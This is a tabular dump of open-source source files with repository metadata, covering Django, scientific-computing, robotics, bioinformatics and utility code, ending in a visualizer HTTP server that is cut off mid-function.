hexsha stringlengths 40 40 | size int64 3 1.03M | ext stringclasses 10
values | lang stringclasses 1
value | max_stars_repo_path stringlengths 3 972 | max_stars_repo_name stringlengths 6 130 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 972 | max_issues_repo_name stringlengths 6 130 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 116k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 972 | max_forks_repo_name stringlengths 6 130 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 3 1.03M | avg_line_length float64 1.13 941k | max_line_length int64 2 941k | alphanum_fraction float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
4b91fe4dd175731041354e85341278b6a5b72cdf | 411 | py | Python | post/migrations/0014_post_video.py | VotarkSocial/votarkAPI | eea10a64ac0b255c97078b90786fccb30d0a451e | [
"MIT"
] | 2 | 2020-06-14T08:25:29.000Z | 2021-09-22T07:48:11.000Z | post/migrations/0014_post_video.py | suulcoder/votarkAPI | eea10a64ac0b255c97078b90786fccb30d0a451e | [
"MIT"
] | 10 | 2020-06-14T08:36:42.000Z | 2022-03-12T00:30:53.000Z | post/migrations/0014_post_video.py | suulcoder/votarkAPI | eea10a64ac0b255c97078b90786fccb30d0a451e | [
"MIT"
] | 1 | 2021-09-22T07:48:17.000Z | 2021-09-22T07:48:17.000Z | # Generated by Django 3.0.4 on 2020-05-21 03:24
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('post', '0013_remove_post_video'),
]
operations = [
migrations.AddField(
model_name='post',
name='video',
field=models.FileField(null=True, upload_to='videos/', verbose_name=''),
),
]
| 21.631579 | 84 | 0.596107 |
fa5ce1460b924bf0b0a12b52cfeae48821cd9f44 | 2,433 | py | Python | hecuba_py/tests/withcassandra/hfetch_tests.py | cugni/hecuba | 5f4654d068dff0ef641d37d98bdac46e539fea48 | [
"Apache-2.0"
] | 6 | 2017-11-09T12:59:54.000Z | 2022-02-03T14:04:29.000Z | hecuba_py/tests/withcassandra/hfetch_tests.py | cugni/hecuba | 5f4654d068dff0ef641d37d98bdac46e539fea48 | [
"Apache-2.0"
] | 150 | 2017-10-18T09:24:46.000Z | 2021-11-02T13:28:50.000Z | hecuba_py/tests/withcassandra/hfetch_tests.py | cugni/hecuba | 5f4654d068dff0ef641d37d98bdac46e539fea48 | [
"Apache-2.0"
] | 3 | 2017-11-10T18:56:46.000Z | 2021-11-02T10:35:14.000Z | import unittest
import numpy as np
from hecuba import config, StorageDict
from hfetch import HArrayMetadata
class ConcurrentDict(StorageDict):
'''
@TypeSpec <<key:int>,value:int>
'''
class HfetchTests(unittest.TestCase):
def test_timestamped_writes(self):
previous_cfg = config.timestamped_writes
config.timestamped_writes = "True"
my_dict = ConcurrentDict("concurrent_dict")
last_value = 1000
for value in range(last_value):
my_dict[0] = value
del my_dict
import gc
gc.collect()
my_dict = ConcurrentDict("concurrent_dict")
retrieved = my_dict[0]
config.timestamped_writes = previous_cfg
self.assertEqual(retrieved, last_value - 1)
def test_harray_metadata_init(self):
base = np.arange(7 * 8 * 9 * 10).reshape((7, 8, 9, 10))
args = (list(base.shape), list(base.strides), base.dtype.kind, base.dtype.byteorder,
base.itemsize, base.flags.num, 0)
obj = HArrayMetadata(*args)
with self.assertRaises(TypeError):
obj = HArrayMetadata()
with self.assertRaises(TypeError):
obj = HArrayMetadata(args[1:])
def test_harray_metadata_refs(self):
base = np.arange(10)
args = (list(base.shape), list(base.strides), base.dtype.kind, base.dtype.byteorder,
base.itemsize, base.flags.num, 0)
obj = HArrayMetadata(*args)
import gc
gc.collect()
import sys
# The test has the first ref, the method getrefcount has the second reference
self.assertEqual(sys.getrefcount(obj), 2)
def test_register(self):
from hfetch import HArrayMetadata
# connecting c++ bindings
from hecuba import config
config.session.execute("DROP KEYSPACE IF EXISTS test_np_meta;")
config.session.execute("CREATE KEYSPACE IF NOT EXISTS test_np_meta "
"WITH replication = {'class': 'SimpleStrategy', 'replication_factor': 1};")
config.session.execute("""CREATE TYPE IF NOT EXISTS test_np_meta.np_meta (flags int, elem_size int,
partition_type tinyint, dims list<int>, strides list<int>, typekind text, byteorder text)""")
config.cluster.register_user_type('test_np_meta', 'np_meta', HArrayMetadata)
config.session.execute("DROP KEYSPACE IF EXISTS test_np_meta;")
| 31.597403 | 108 | 0.646116 |
3613265be69e051f091160242a66e532da487674 | 417 | py | Python | setup.py | edersohe/bottle-resource | dd409ced21cf0c697af7b24647f647bd02018b2c | [
"MIT"
] | null | null | null | setup.py | edersohe/bottle-resource | dd409ced21cf0c697af7b24647f647bd02018b2c | [
"MIT"
] | null | null | null | setup.py | edersohe/bottle-resource | dd409ced21cf0c697af7b24647f647bd02018b2c | [
"MIT"
] | null | null | null | from setuptools import setup
requirements = open('requirements.txt').readlines()
setup(
name='bottle-resource',
version='0.0.1b',
author='Eder Sosa',
author_email='eder.sohe@gmail.com',
description='Bottle resource help to build resource APIs',
py_modules=['bottle_resource'],
install_requires=requirements,
license='MIT',
url='https://github.com/edersohe/bottle-resource.git'
)
| 26.0625 | 62 | 0.705036 |
cff199c74ce3e1fb79b4241bb40259e55a05df48 | 619 | py | Python | neutron/plugins/virtualbox/__init__.py | alexandrucoman/vbox-neutron-agent | 4c6955276d9a3d534505fe2b08948a76acda3d6f | [
"Apache-2.0"
] | null | null | null | neutron/plugins/virtualbox/__init__.py | alexandrucoman/vbox-neutron-agent | 4c6955276d9a3d534505fe2b08948a76acda3d6f | [
"Apache-2.0"
] | null | null | null | neutron/plugins/virtualbox/__init__.py | alexandrucoman/vbox-neutron-agent | 4c6955276d9a3d534505fe2b08948a76acda3d6f | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2015 Cloudbase Solutions Srl
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
| 44.214286 | 78 | 0.728595 |
905b92a91ff9aaae054d1f6e3c7b18fa7f9c731d | 908 | py | Python | setup.py | lucassel/bitchbetterhavemymoney | b3036b65b6e5b1e2f1fc903bde1691d7f4c8c725 | [
"MIT"
] | null | null | null | setup.py | lucassel/bitchbetterhavemymoney | b3036b65b6e5b1e2f1fc903bde1691d7f4c8c725 | [
"MIT"
] | null | null | null | setup.py | lucassel/bitchbetterhavemymoney | b3036b65b6e5b1e2f1fc903bde1691d7f4c8c725 | [
"MIT"
] | null | null | null | from setuptools import setup
def readme():
with open('README.md', encoding='utf-8') as f:
README = f.read()
return README
setup(
name="bitchbetterhavemymoney",
version="0.0.0.5",
description="A Python CLI tool to check your Monizze maaltijdcheques.",
long_description=readme(),
long_description_content_type="text/plain",
url="https://github.com/lucassel/bitchbetterhavemymoney",
author="Lucas Selfslagh",
license="MIT",
classifiers=[
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.7",
],
packages=["bitchbetterhavemymoney"],
include_package_data=True,
install_requires=[
'selenium',
],
entry_points={
"console_scripts": [
"bitchbetterhavemymoney=bitchbetterhavemymoney.cli:main",
]
},
) | 25.942857 | 75 | 0.631057 |
da987703430260ca008bcc2ff5849f246490dd58 | 419 | py | Python | acce/setup.py | ciphertechsolutions/stoq-plugins-public | 95cfc1c5ef01da95e96ea9f7cbfecebd4451c88c | [
"Apache-2.0"
] | null | null | null | acce/setup.py | ciphertechsolutions/stoq-plugins-public | 95cfc1c5ef01da95e96ea9f7cbfecebd4451c88c | [
"Apache-2.0"
] | null | null | null | acce/setup.py | ciphertechsolutions/stoq-plugins-public | 95cfc1c5ef01da95e96ea9f7cbfecebd4451c88c | [
"Apache-2.0"
] | null | null | null | from setuptools import setup, find_packages
setup(
name="acce",
version="3.0.0",
author="Cipher Tech Solutions (acce.support@ciphertechsolutions.com)",
url="https://github.com/PUNCH-Cyber/stoq-plugins-public",
license="Apache License 2.0",
description="Scan payloads using ACCE (Automated Component and Configuration Extraction)",
packages=find_packages(),
include_package_data=True,
)
| 32.230769 | 94 | 0.73031 |
ffbc48cc7db0d1435e47fe296212a9959d31d5fd | 403 | py | Python | projects/migrations/0030_auto_20200722_2228.py | peppasd/LIT | 80e256e7678be3cf3ad72d152005cdb7778545d5 | [
"MIT"
] | 2 | 2020-06-05T14:49:11.000Z | 2021-07-19T17:50:05.000Z | projects/migrations/0030_auto_20200722_2228.py | peppasd/LIT | 80e256e7678be3cf3ad72d152005cdb7778545d5 | [
"MIT"
] | 50 | 2020-05-29T11:15:33.000Z | 2020-07-29T15:30:53.000Z | projects/migrations/0030_auto_20200722_2228.py | peppasd/LIT | 80e256e7678be3cf3ad72d152005cdb7778545d5 | [
"MIT"
] | null | null | null | # Generated by Django 3.0.8 on 2020-07-22 20:28
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('projects', '0029_auto_20200722_1601'),
]
operations = [
migrations.AlterField(
model_name='photo',
name='photo',
field=models.FileField(blank=True, upload_to='images/'),
),
]
| 21.210526 | 68 | 0.600496 |
efb31b3b8c6763a5c89744a61bc549f6436dfb7d | 4,542 | py | Python | twist_controller/twist_controller.py | ashutoshpatel2210/CarNd-Capstone-ashutosh | 1aecc77bf5ed39eba121a8bd9dc0580f122753c2 | [
"MIT"
] | null | null | null | twist_controller/twist_controller.py | ashutoshpatel2210/CarNd-Capstone-ashutosh | 1aecc77bf5ed39eba121a8bd9dc0580f122753c2 | [
"MIT"
] | 10 | 2019-12-16T22:19:32.000Z | 2022-02-10T00:47:29.000Z | twist_controller/twist_controller.py | ashutoshpatel2210/CarNd-Capstone-ashutosh | 1aecc77bf5ed39eba121a8bd9dc0580f122753c2 | [
"MIT"
] | null | null | null |
from pid import PID
from lowpass import LowPassFilter
from yaw_controller import YawController
import rospy
GAS_DENSITY = 2.858
ONE_MPH = 0.44704
LOGGING_THROTTLE_FACTOR = 1
class Controller(object):
def __init__(self, vehicle_mass,fuel_capacity, brake_deadband, decel_limit,
accel_limit,
wheel_radius,
wheel_base,
steer_ratio,
max_lat_accel,
max_steer_angle):
# TODO: Implement
self.yaw_controller = YawController(wheel_base, steer_ratio, 0.1, max_lat_accel, max_steer_angle)
kp = 0.3
ki = 0.1
kd = 0
mn = 0.0
mx = 0.4
self.throttle_controller = PID(kp, ki, kd, mn, mx)
tau = 0.5
ts = 0.02
self.vel_lpf = LowPassFilter(tau, ts)
#self.lowpass_steer = LowPassFilter(tau, ts)
self.vehicle_mass = vehicle_mass
self.fuel_capacity = fuel_capacity
self.brake_deadband = brake_deadband
self.decel_limit = decel_limit
self.accel_limit = accel_limit
self.wheel_radius = wheel_radius
self.last_time = rospy.get_time()
self.log_time = rospy.get_time()
def control(self, current_vel, dbw_enabled, linear_vel, angular_vel):
# TODO: Change the arg, kwarg list to suit your needs
# Return throttle, brake, steer
if not dbw_enabled:
self.throttle_controller.reset()
return 0.0, 0.0, 0.0
current_vel = self.vel_lpf.filt(current_vel)
current_time = rospy.get_time()
sample_time = current_time - self.last_time
self.last_time = current_time
#steer = self.lowpass_steer.filt(steering)
vel_error = linear_vel - current_vel
self.last_vel = current_vel
throttle = self.throttle_controller.step(vel_error, sample_time)
brake = 0.0
if linear_vel == 0.0 and current_vel < 0.1:
throttle = 0.0
brake = 400.0
elif throttle < 0.1 and vel_error < 0.0:
throttle = 0.0
decel = max(vel_error, self.decel_limit)
brake = min(400.0, (abs(decel) * self.vehicle_mass * self.wheel_radius))
steering = self.yaw_controller.get_steering(linear_vel, angular_vel, current_vel)
if (current_time - self.log_time) > LOGGING_THROTTLE_FACTOR:
self.log_time = current_time
rospy.logwarn("POSE: current_vel={:.2f}, linear_vel={:.2f}, vel_error={:.2f}".format(current_vel,
linear_vel,
vel_error))
rospy.logwarn("POSE: throttle={:.2f}, brake={:.2f}, steering={:.2f}".format(throttle, brake, steering))
return throttle, brake, steering
'''
if current_vel < 0.1:
brake = 700
throttle = 0
sterring = 0
else:
vel_error = self.vel_lpf.filt(linear_vel - current_vel)
throttle = self.throttle_controller.step(vel_error, sample_time)
if throttle > 0:
brake = 0
else:
decel = -throttle
throttle = 0
if decel < self.brake_deadband:
decel = 0
brake = min(700.0, (abs(decel) * self.vehicle_mass * self.wheel_radius))
steering = self.yaw_controller.get_steering(linear_vel, angular_vel, current_vel)
#if (current_time - self.log_time) > LOGGING_THROTTLE_FACTOR:
# self.log_time = current_time
rospy.logwarn("POSE: current_vel={:.2f}, linear_vel={:.2f}, vel_error={:.2f}".format(current_vel,
linear_vel,
vel_error))
rospy.logwarn("POSE: throttle={:.2f}, brake={:.2f}, steering={:.2f}".format(throttle, brake, steering))
return throttle, brake, steering
'''
| 38.491525 | 115 | 0.505504 |
c3e173cbb7dd619a0c6f79f613e46b1d11436545 | 267 | py | Python | scripts/Hisat.py | KoesGroup/Snakemake_hisat-DESeq | b41114f57956c5ccb2bdbe3f98a0be8865788b70 | [
"MIT"
] | 3 | 2019-04-19T03:13:49.000Z | 2020-09-16T07:19:36.000Z | scripts/Hisat.py | KoesGroup/Snakemake_hisat-DESeq | b41114f57956c5ccb2bdbe3f98a0be8865788b70 | [
"MIT"
] | 20 | 2018-10-04T09:47:55.000Z | 2019-11-26T10:21:28.000Z | scripts/Hisat.py | KoesGroup/Snakemake_hisat-DESeq | b41114f57956c5ccb2bdbe3f98a0be8865788b70 | [
"MIT"
] | 4 | 2019-11-14T17:22:41.000Z | 2021-08-24T13:18:20.000Z | import sys
import os
args = sys.argv
os.system("cd ../")
num = len(args[2:])/3
for i in range(2,2+num):
command = "hisat2 -x {} -1 {} -2 {} | samtools view -Sb -f 2 {}".format(args[1],args[i],args[i+num],args[i+2*num])
print(command)
#os.system(command) | 24.272727 | 118 | 0.59176 |
d6fe15e05472cc59c90ce9e660d5136292b4fd29 | 2,487 | py | Python | examples/misc/suspend_pipelines.py | wilkinson/radical.entk | c73e031966f029bc401cfc23b15e1431112b6572 | [
"MIT"
] | null | null | null | examples/misc/suspend_pipelines.py | wilkinson/radical.entk | c73e031966f029bc401cfc23b15e1431112b6572 | [
"MIT"
] | null | null | null | examples/misc/suspend_pipelines.py | wilkinson/radical.entk | c73e031966f029bc401cfc23b15e1431112b6572 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
import os
import sys
import time
import radical.entk as re
# ------------------------------------------------------------------------------
#
hostname = os.environ.get('RMQ_HOSTNAME', 'localhost')
port = int(os.environ.get('RMQ_PORT', 5672))
pipes = list()
cnt = 0
# ------------------------------------------------------------------------------
#
def generate_pipeline(master=False):
global pipes
if master:
def func_condition_1():
for p in pipes[1:]:
p.suspend()
def func_condition_2():
for p in pipes[1:]:
p.resume()
else:
def func_condition_1(): pass
def func_condition_2(): pass
# --------------------------------------------------------------------------
# create a pipeline, stage and tasks
t1 = re.Task()
t1.executable = '/bin/sleep'
if master: t1.arguments = [' 1']
else : t1.arguments = ['10']
s1 = re.Stage()
s1.add_tasks(t1)
s1.post_exec = func_condition_1
t2 = re.Task()
t2.executable = '/bin/sleep'
t2.arguments = ['1']
s2 = re.Stage()
s2.add_tasks(t2)
s2.post_exec = func_condition_2
p = re. Pipeline()
p.add_stages(s1)
p.add_stages(s2)
return p
# ------------------------------------------------------------------------------
#
if __name__ == '__main__':
# Create a dictionary describe four mandatory keys:
# resource, walltime, cores and project
# resource is 'local.localhost' to execute locally
res_dict = {
'resource': 'local.localhost',
'walltime': 15,
'cpus' : 2,
}
# Create Application Manager
appman = re.AppManager(hostname=hostname, port=port)
appman.resource_desc = res_dict
pipes.append(generate_pipeline(True))
pipes.append(generate_pipeline(False))
pipes.append(generate_pipeline(False))
pipes.append(generate_pipeline(False))
# Assign the workflow as a set of Pipelines to the Application Manager
appman.workflow = pipes
done = False
def tmp():
while not done:
for p in pipes:
print p.state,
print
time.sleep(1)
import threading as mt
t = mt.Thread(target=tmp)
t.start()
# Run the Application Manager
appman.run()
appman.terminate()
done = True
t.join()
# ------------------------------------------------------------------------------
| 22.609091 | 80 | 0.500201 |
6c3545c82c8fe07d34a503ae14ad8c6861b5cfa7 | 8,537 | py | Python | tests/build/scipy/scipy/special/tests/test_orthogonal_eval.py | crougeux/-a-i_v1.6.3_modif | b499a812e79f335d082d3f9b1070e0465ad67bab | [
"BSD-3-Clause"
] | 26 | 2018-02-14T23:52:58.000Z | 2021-08-16T13:50:03.000Z | tests/build/scipy/scipy/special/tests/test_orthogonal_eval.py | crougeux/-a-i_v1.6.3_modif | b499a812e79f335d082d3f9b1070e0465ad67bab | [
"BSD-3-Clause"
] | null | null | null | tests/build/scipy/scipy/special/tests/test_orthogonal_eval.py | crougeux/-a-i_v1.6.3_modif | b499a812e79f335d082d3f9b1070e0465ad67bab | [
"BSD-3-Clause"
] | 10 | 2018-08-13T19:38:39.000Z | 2020-04-19T03:02:00.000Z | from __future__ import division, print_function, absolute_import
from distutils.version import LooseVersion
import sys
import numpy as np
from numpy.testing import assert_, assert_allclose, dec
import scipy.special.orthogonal as orth
from scipy.special._testutils import FuncData
# Early Numpy versions have bugs in ufunc keyword argument parsing
numpy_version_requirement = dec.skipif(
LooseVersion(np.version.version) < LooseVersion('1.6')
and sys.version_info[0] >= 3,
"Bug in Numpy < 1.6 on Python 3")
def test_eval_chebyt():
n = np.arange(0, 10000, 7)
x = 2*np.random.rand() - 1
v1 = np.cos(n*np.arccos(x))
v2 = orth.eval_chebyt(n, x)
assert_(np.allclose(v1, v2, rtol=1e-15))
def test_warnings():
# ticket 1334
olderr = np.seterr(all='raise')
try:
# these should raise no fp warnings
orth.eval_legendre(1, 0)
orth.eval_laguerre(1, 1)
orth.eval_gegenbauer(1, 1, 0)
finally:
np.seterr(**olderr)
class TestPolys(object):
"""
Check that the eval_* functions agree with the constructed polynomials
"""
def check_poly(self, func, cls, param_ranges=[], x_range=[], nn=10,
nparam=10, nx=10, rtol=1e-8):
np.random.seed(1234)
dataset = []
for n in np.arange(nn):
params = [a + (b-a)*np.random.rand(nparam) for a,b in param_ranges]
params = np.asarray(params).T
if not param_ranges:
params = [0]
for p in params:
if param_ranges:
p = (n,) + tuple(p)
else:
p = (n,)
x = x_range[0] + (x_range[1] - x_range[0])*np.random.rand(nx)
x[0] = x_range[0] # always include domain start point
x[1] = x_range[1] # always include domain end point
poly = np.poly1d(cls(*p))
z = np.c_[np.tile(p, (nx,1)), x, poly(x)]
dataset.append(z)
dataset = np.concatenate(dataset, axis=0)
def polyfunc(*p):
p = (p[0].astype(int),) + p[1:]
return func(*p)
olderr = np.seterr(all='raise')
try:
ds = FuncData(polyfunc, dataset, list(range(len(param_ranges)+2)), -1,
rtol=rtol)
ds.check()
finally:
np.seterr(**olderr)
def test_jacobi(self):
self.check_poly(orth.eval_jacobi, orth.jacobi,
param_ranges=[(-0.99, 10), (-0.99, 10)], x_range=[-1, 1],
rtol=1e-5)
def test_sh_jacobi(self):
self.check_poly(orth.eval_sh_jacobi, orth.sh_jacobi,
param_ranges=[(1, 10), (0, 1)], x_range=[0, 1],
rtol=1e-5)
def test_gegenbauer(self):
self.check_poly(orth.eval_gegenbauer, orth.gegenbauer,
param_ranges=[(-0.499, 10)], x_range=[-1, 1],
rtol=1e-7)
def test_chebyt(self):
self.check_poly(orth.eval_chebyt, orth.chebyt,
param_ranges=[], x_range=[-1, 1])
def test_chebyu(self):
self.check_poly(orth.eval_chebyu, orth.chebyu,
param_ranges=[], x_range=[-1, 1])
def test_chebys(self):
self.check_poly(orth.eval_chebys, orth.chebys,
param_ranges=[], x_range=[-2, 2])
def test_chebyc(self):
self.check_poly(orth.eval_chebyc, orth.chebyc,
param_ranges=[], x_range=[-2, 2])
def test_sh_chebyt(self):
olderr = np.seterr(all='ignore')
try:
self.check_poly(orth.eval_sh_chebyt, orth.sh_chebyt,
param_ranges=[], x_range=[0, 1])
finally:
np.seterr(**olderr)
def test_sh_chebyu(self):
self.check_poly(orth.eval_sh_chebyu, orth.sh_chebyu,
param_ranges=[], x_range=[0, 1])
def test_legendre(self):
self.check_poly(orth.eval_legendre, orth.legendre,
param_ranges=[], x_range=[-1, 1])
def test_sh_legendre(self):
olderr = np.seterr(all='ignore')
try:
self.check_poly(orth.eval_sh_legendre, orth.sh_legendre,
param_ranges=[], x_range=[0, 1])
finally:
np.seterr(**olderr)
def test_genlaguerre(self):
self.check_poly(orth.eval_genlaguerre, orth.genlaguerre,
param_ranges=[(-0.99, 10)], x_range=[0, 100])
def test_laguerre(self):
self.check_poly(orth.eval_laguerre, orth.laguerre,
param_ranges=[], x_range=[0, 100])
def test_hermite(self):
self.check_poly(orth.eval_hermite, orth.hermite,
param_ranges=[], x_range=[-100, 100])
def test_hermitenorm(self):
self.check_poly(orth.eval_hermitenorm, orth.hermitenorm,
param_ranges=[], x_range=[-100, 100])
class TestRecurrence(object):
"""
Check that the eval_* functions sig='ld->d' and 'dd->d' agree.
"""
def check_poly(self, func, param_ranges=[], x_range=[], nn=10,
nparam=10, nx=10, rtol=1e-8):
np.random.seed(1234)
dataset = []
for n in np.arange(nn):
params = [a + (b-a)*np.random.rand(nparam) for a,b in param_ranges]
params = np.asarray(params).T
if not param_ranges:
params = [0]
for p in params:
if param_ranges:
p = (n,) + tuple(p)
else:
p = (n,)
x = x_range[0] + (x_range[1] - x_range[0])*np.random.rand(nx)
x[0] = x_range[0] # always include domain start point
x[1] = x_range[1] # always include domain end point
kw = dict(sig=(len(p)+1)*'d'+'->d')
z = np.c_[np.tile(p, (nx,1)), x, func(*(p + (x,)), **kw)]
dataset.append(z)
dataset = np.concatenate(dataset, axis=0)
def polyfunc(*p):
p = (p[0].astype(int),) + p[1:]
kw = dict(sig='l'+(len(p)-1)*'d'+'->d')
return func(*p, **kw)
olderr = np.seterr(all='raise')
try:
ds = FuncData(polyfunc, dataset, list(range(len(param_ranges)+2)), -1,
rtol=rtol)
ds.check()
finally:
np.seterr(**olderr)
@numpy_version_requirement
def test_jacobi(self):
self.check_poly(orth.eval_jacobi,
param_ranges=[(-0.99, 10), (-0.99, 10)], x_range=[-1, 1])
@numpy_version_requirement
def test_sh_jacobi(self):
self.check_poly(orth.eval_sh_jacobi,
param_ranges=[(1, 10), (0, 1)], x_range=[0, 1])
@numpy_version_requirement
def test_gegenbauer(self):
self.check_poly(orth.eval_gegenbauer,
param_ranges=[(-0.499, 10)], x_range=[-1, 1])
@numpy_version_requirement
def test_chebyt(self):
self.check_poly(orth.eval_chebyt,
param_ranges=[], x_range=[-1, 1])
@numpy_version_requirement
def test_chebyu(self):
self.check_poly(orth.eval_chebyu,
param_ranges=[], x_range=[-1, 1])
@numpy_version_requirement
def test_chebys(self):
self.check_poly(orth.eval_chebys,
param_ranges=[], x_range=[-2, 2])
@numpy_version_requirement
def test_chebyc(self):
self.check_poly(orth.eval_chebyc,
param_ranges=[], x_range=[-2, 2])
@numpy_version_requirement
def test_sh_chebyt(self):
self.check_poly(orth.eval_sh_chebyt,
param_ranges=[], x_range=[0, 1])
@numpy_version_requirement
def test_sh_chebyu(self):
self.check_poly(orth.eval_sh_chebyu,
param_ranges=[], x_range=[0, 1])
@numpy_version_requirement
def test_legendre(self):
self.check_poly(orth.eval_legendre,
param_ranges=[], x_range=[-1, 1])
@numpy_version_requirement
def test_sh_legendre(self):
self.check_poly(orth.eval_sh_legendre,
param_ranges=[], x_range=[0, 1])
@numpy_version_requirement
def test_genlaguerre(self):
self.check_poly(orth.eval_genlaguerre,
param_ranges=[(-0.99, 10)], x_range=[0, 100])
@numpy_version_requirement
def test_laguerre(self):
self.check_poly(orth.eval_laguerre,
param_ranges=[], x_range=[0, 100])
| 32.96139 | 82 | 0.554879 |
f3673f2d1e23e9414d5272cc47fcb027526cd67b | 2,123 | py | Python | tools/templatetool/templatetool.py | zfzackfrost/incredible_vulk | b5a6eb7072d5dc1d6e7a24d31379c1c6986f225c | [
"MIT"
] | null | null | null | tools/templatetool/templatetool.py | zfzackfrost/incredible_vulk | b5a6eb7072d5dc1d6e7a24d31379c1c6986f225c | [
"MIT"
] | null | null | null | tools/templatetool/templatetool.py | zfzackfrost/incredible_vulk | b5a6eb7072d5dc1d6e7a24d31379c1c6986f225c | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
"""Python script to process Jinja2 template
files and print to STDOUT.
"""
import argparse
import json
import sys
import os.path
from ttool import get_env
def process_args():
"""Process command line arguments
"""
parser = argparse.ArgumentParser(
prog="templatetool.py",
description="Script to process Jinja2 template files and print them to STDOUT",
)
parser.add_argument(
"input", help="Specify the Jinja2 template file to process", type=str
)
parser.add_argument(
"--output", '-o', help="Specify the output file path", type=str, default=None,
)
parser.add_argument(
"--context", "-c", default="{}", help="The Jinja2 context as JSON code.",
)
parser.add_argument(
"--include",
"-I",
action="append",
help="Add a directory to the template search path",
)
return parser.parse_args()
def process_templates(template_path, include_paths, context):
"""Process template file
"""
env = get_env(include_paths)
return env.get_template(template_path).render(context)
def main():
"""Main function"""
args = process_args()
input_path = os.path.relpath(args.input.rstrip('/'), os.getcwd())
try:
context = json.loads(args.context)
except json.JSONDecodeError as err:
print(err.msg)
return 1
include_paths = list(args.include) + [os.path.dirname(input_path), os.getcwd()]
include_paths = [os.path.normpath(os.path.abspath(p)) for p in include_paths]
if not isinstance(context, dict):
print("Context root must be a dictionary!")
return 1
result = process_templates(str(input_path), include_paths, context)
output = args.output
if output is not None:
if os.path.splitext(output)[1] == ".jinja":
output = os.path.splitext(output)[0]
os.makedirs(os.path.dirname(output), exist_ok=True)
with open(output, 'w') as wfile:
wfile.write(result)
else:
print(result)
return 0
if __name__ == "__main__":
sys.exit(main())
| 26.873418 | 87 | 0.63919 |
7f7c08b6e9c850f489e9427c7843eb05f5ec1f5d | 1,312 | py | Python | Python/fixedPoint.py | eechava6/NumericalAnalysisMethods | 3eeb06bdb20d97f13a09fd0ed71bce045173ffef | [
"MIT"
] | null | null | null | Python/fixedPoint.py | eechava6/NumericalAnalysisMethods | 3eeb06bdb20d97f13a09fd0ed71bce045173ffef | [
"MIT"
] | null | null | null | Python/fixedPoint.py | eechava6/NumericalAnalysisMethods | 3eeb06bdb20d97f13a09fd0ed71bce045173ffef | [
"MIT"
] | null | null | null | from function import f
from function import g
import numpy as np
import math
def fixedPoint (xi,tol,max_iter):
res = {}
f_xi = f(xi)
g_xi = g(xi)
return_list = []
return_list.append({
'iter':0,
'xi': xi,
'g(xi)':g_xi,
'f(xi)': f_xi,
'error':'NA'
})
count = 1
error = tol + 1
while error > tol and count <= max_iter:
xn = g_xi
g_xi = g(xn)
f_xi = f(xn)
error = abs(xn-xi)
xi = xn
row = {
'iter' : count,
'xi': xi,
'g(xi)':g_xi,
'f(xi)': f_xi,
'error': error
}
return_list.append(row)
if(f_xi == 0):
res["iters"] = return_list
res["status"] = 'Root found! ;)'
res["error"] = False
return res
elif(error < tol):
res["iters"] = return_list
res["status"] = 'Err lower than tolerance! :)'
res["error"] = False
return res
elif(count >= max_iter):
res["iters"] = return_list
res["status"] = 'Overpassed max iteration! :('
res["error"] = True
return res
count = count + 1
return {"iters" : return_list}
| 23.428571 | 58 | 0.4375 |
1e6aad6431ee5225e3fdfc6af90dd0b922869e9b | 4,403 | py | Python | Route_prediction/visualizer/HTTPServer.py | ashishpatel26/machine-learning-1 | 8ec46055582391d71de970ebcf173d0129ac2993 | [
"Apache-2.0"
] | 1 | 2018-06-29T13:35:56.000Z | 2018-06-29T13:35:56.000Z | Route_prediction/visualizer/HTTPServer.py | nav-e/machine-learning | 8ec46055582391d71de970ebcf173d0129ac2993 | [
"Apache-2.0"
] | null | null | null | Route_prediction/visualizer/HTTPServer.py | nav-e/machine-learning | 8ec46055582391d71de970ebcf173d0129ac2993 | [
"Apache-2.0"
] | 2 | 2017-11-26T00:42:48.000Z | 2021-07-09T04:29:14.000Z | #!/usr/bin/env python
import os
import sys
import urllib
import SimpleHTTPServer
import SocketServer
from cStringIO import StringIO
import data
from data.hdf5 import TaxiDataset
from visualizer import Vlist, Path
visualizer_path = os.path.join(data.path, 'visualizer')
source_path = os.path.split(os.path.realpath(__file__))[0]
test_data = None
train_data = None
class VisualizerHTTPRequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def send_head(self):
spath = self.path.split('?')[0]
path = spath.split('/')[1:]
if len(path) == 1:
if path[0] == '':
path[0] = 'index.html'
file_path = os.path.join(source_path, path[0])
return self.send_file(file_path)
elif path[0] == 'ls':
return self.send_datalist()
elif path[0] == 'get':
return self.send_file(os.path.join(visualizer_path, spath[5:]))
elif path[0] == 'extract':
return self.send_extract(spath[9:])
def send_file(self, file_path):
file_path = urllib.unquote(file_path)
ctype = self.guess_type(file_path)
try:
f = open(file_path, 'rb')
except IOError:
self.send_error(404, 'File not found')
return None
try:
self.send_response(200)
self.send_header('Content-type', ctype)
fs = os.fstat(f.fileno())
self.send_header('Content-Length', str(fs[6]))
self.send_header('Last-Modified', self.date_time_string(fs.st_mtime))
